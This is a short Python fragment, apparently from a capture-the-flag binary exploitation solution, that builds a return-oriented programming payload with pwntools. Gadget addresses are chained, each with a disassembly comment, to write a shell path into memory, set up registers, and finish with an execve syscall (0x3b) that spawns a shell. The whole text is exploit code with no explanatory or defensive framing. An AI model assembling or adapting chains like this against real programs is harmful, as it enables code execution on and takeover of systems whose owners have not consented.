payload = p64(0x4070ed)
#0x00000000004070ed: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x41a0ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4070ed)
# 0x00000000004070ed: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x41a0b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x406711)
# 0x0000000000406711: pop rsi; ret; 
payload += p64(0x0)+p64(0x4065de)
# 0x00000000004065de: pop r12; ret; 
payload += p64(0x41a070)+p64(0x406748)
# 0x0000000000406748: pop rbx; ret; 
payload += p64(0x4070ed)+p64(0x406746)
# 0x0000000000406746: mov eax, ebx; pop rbx; ret; 
payload += p64(0x0)+p64(0x409020)
# 0x0000000000409020: mov rdi, r12; call rax; 
payload += b''
# 0x00000000004070ed: pop rbx; pop rbp; ret; 
payload += p64(0x0)+p64(0x40b9fd)
# 0x000000000040b9fd: cmp edx, -2; mov edx, 0; cmovae rax, rdx; add rsp, 8; pop rbx; pop rbp; pop r12; pop r13; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x406748)
# 0x0000000000406748: pop rbx; ret; 
payload += p64(0x3b)+p64(0x406746)
# 0x0000000000406746: mov eax, ebx; pop rbx; ret; 
payload += p64(0x0)+p64(0x407ef9)
# 0x0000000000407ef9: syscall; 
payload += b''
